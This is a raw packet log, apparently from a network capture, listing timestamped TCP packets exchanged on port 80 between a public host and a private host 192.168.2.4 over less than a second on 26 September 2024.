Sep 26, 2024 00:39:08.545176029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545186043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545188904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.545197010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545211077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545222044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545229912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.545229912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.545232058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545242071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545253992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545262098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.545262098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.545264959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545278072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545296907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.545372963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545383930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545387983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.545396090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545407057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545417070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545419931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.545428038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545433998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.545439959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545460939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545464993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.545470953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545481920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545492887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545497894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.545504093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545512915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.545532942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.545542002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.669853926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.669878960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.669891119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.669902086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.669914961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.669928074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.669938087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.669950008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.669967890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.669977903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.669985056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.669989109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670001984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670068026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670079947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670090914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670092106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670101881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670114040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670121908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670156002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670227051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670227051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670239925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670250893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670262098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670273066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670274019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670284033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670295000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670305014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670315027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670330048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670330048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670367002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670394897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670406103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670416117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670424938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670435905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670445919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670455933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670460939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670468092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670478106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670481920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670530081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670530081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670629025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670639992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670650005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670660973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670674086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670682907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670687914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670695066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670706034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670716047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670727015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670728922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670738935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670742989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670751095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670763969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670783043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670798063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670835972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670867920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670881033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670890093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670901060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670911074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670922041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670932055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670942068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670952082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670955896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670955896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670964956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670975924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670986891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.670988083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.670988083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671029091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671057940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671160936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671173096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671184063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671200991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671205997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671211958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671222925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671233892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671242952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671255112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671261072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671261072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671267033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671276093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671279907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671292067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671303034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671315908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671323061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671329021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671329975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671504021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671515942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671526909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671538115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671535969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671535969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671549082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671560049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671570063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671580076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671591043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671590090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671591043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671602011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671612024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671621084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671629906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671637058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671637058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671643019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671653986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671664000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671674013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671677113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671685934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671694994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671695948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671708107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671724081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671945095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671962976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671972990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671979904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671979904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.671984911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671997070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.671998978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.672014952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.672025919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.672034025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.672035933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.672048092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.672058105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.672066927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.672066927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.672068119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.672076941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.672084093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.672090054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.672101974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.672112942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.672123909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.672127008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.672127962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.672147989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.672193050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.672199011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.672210932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.672220945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.672231913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.672241926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.672257900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.672313929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.900614977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900649071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900659084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900674105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900685072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900702953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900712967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900724888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900736094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900746107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900746107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.900754929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900767088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900821924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900832891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900839090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.900839090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.900845051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900856972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900867939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900876999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900888920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.900888920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.900945902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900957108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900966883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900978088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.900981903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.900981903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.900990009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901004076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901041031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901041031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901166916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901182890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901200056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901210070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901221037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901231050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901242018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901245117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901245117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901252985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901263952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901273966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901283979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901295900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901305914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901305914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901307106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901315928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901328087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901338100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901348114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901360035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901361942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901361942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901416063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901416063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901469946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901479959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901490927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901501894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901513100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901520967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901530981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901541948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901547909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901547909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901557922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901570082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901578903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901587009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901587009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901591063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901602030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901612997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901622057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901632071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901643038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901659966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901659966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901861906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901874065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901884079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901894093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901899099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901899099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901905060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901916027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901926041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901936054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901947021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.901963949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.901963949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.902003050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902014017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902024031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902034044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902038097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.902038097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.902048111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902060032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902077913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902089119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902096033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.902096033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.902100086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902112007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902122021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902131081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902139902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902143955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.902143955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.902152061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902168036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902188063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902199030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902208090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.902208090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902208090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.902220964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902231932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902241945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902252913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902262926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.902262926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.902262926 CEST	49730	80	192.168.2.4	185.215.113.37
